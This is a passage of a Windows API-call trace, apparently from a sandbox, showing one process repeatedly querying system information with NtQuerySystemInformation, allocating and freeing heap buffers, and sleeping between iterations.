ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0179.767] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0179.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0179.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0179.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0179.769] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.769] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0179.770] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.770] Sleep (dwMilliseconds=0x110) [0179.936] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0179.937] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0179.938] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.938] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0179.938] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0179.939] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0179.940] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0179.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0179.941] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0179.941] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.942] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0179.943] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.943] Sleep (dwMilliseconds=0x110) [0180.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0180.003] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0180.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.005] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0180.005] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0180.006] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.006] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0180.006] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0180.007] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.007] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0180.007] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0180.008] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.008] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0180.009] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.009] Sleep (dwMilliseconds=0x110) [0180.124] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0180.125] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0180.126] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.126] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0180.127] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0180.127] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.128] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0180.128] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0180.129] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.129] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0180.129] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0180.130] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.130] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0180.131] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.131] Sleep (dwMilliseconds=0x110) [0180.212] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0180.212] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0180.213] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.214] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0180.214] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0180.215] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.215] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0180.215] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0180.216] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.216] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0180.220] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0180.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.221] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0180.222] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.222] Sleep (dwMilliseconds=0x110) [0180.640] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0180.640] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0180.641] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.641] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0180.642] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0180.642] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.642] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0180.643] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0180.643] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.643] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0180.644] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0180.644] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.645] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0180.645] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.645] Sleep (dwMilliseconds=0x110) [0180.715] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0180.716] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0180.716] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0180.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0180.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0180.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0180.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.719] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0180.719] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0180.720] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.720] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0180.721] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.721] Sleep (dwMilliseconds=0x110) [0180.765] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0180.765] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0180.766] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.766] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0180.766] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0180.767] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0180.767] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0180.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0180.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0180.769] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.769] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0180.770] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.770] Sleep (dwMilliseconds=0x110) [0180.811] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0180.811] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0180.812] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.812] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0180.813] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0180.813] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.813] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0180.814] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0180.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.814] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0180.815] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0180.815] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.815] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0180.816] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.816] Sleep (dwMilliseconds=0x110) [0180.874] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0180.874] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0180.874] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.875] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0180.875] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0180.876] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0180.876] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0180.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0180.878] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0180.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.879] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0180.880] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.880] Sleep (dwMilliseconds=0x110) [0180.935] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0180.935] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0180.936] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.936] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0180.936] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0180.937] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.937] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0180.938] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0180.939] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0180.939] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0180.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0180.941] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.941] Sleep (dwMilliseconds=0x110) [0180.957] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0180.958] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0180.958] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.959] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0180.959] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0180.959] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.960] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0180.960] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0180.960] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.961] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0180.961] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0180.962] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.962] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0180.963] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0180.963] Sleep (dwMilliseconds=0x110) [0181.120] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0181.120] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0181.121] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.121] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0181.122] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0181.123] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.123] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0181.123] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0181.124] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.124] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0181.124] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0181.125] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.125] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0181.126] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.126] Sleep (dwMilliseconds=0x110) [0181.157] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0181.157] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0181.157] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.158] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0181.158] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0181.159] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.159] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0181.159] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0181.160] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.160] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0181.160] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0181.161] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.161] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0181.162] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.162] Sleep (dwMilliseconds=0x110) [0181.170] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0181.311] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0181.312] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 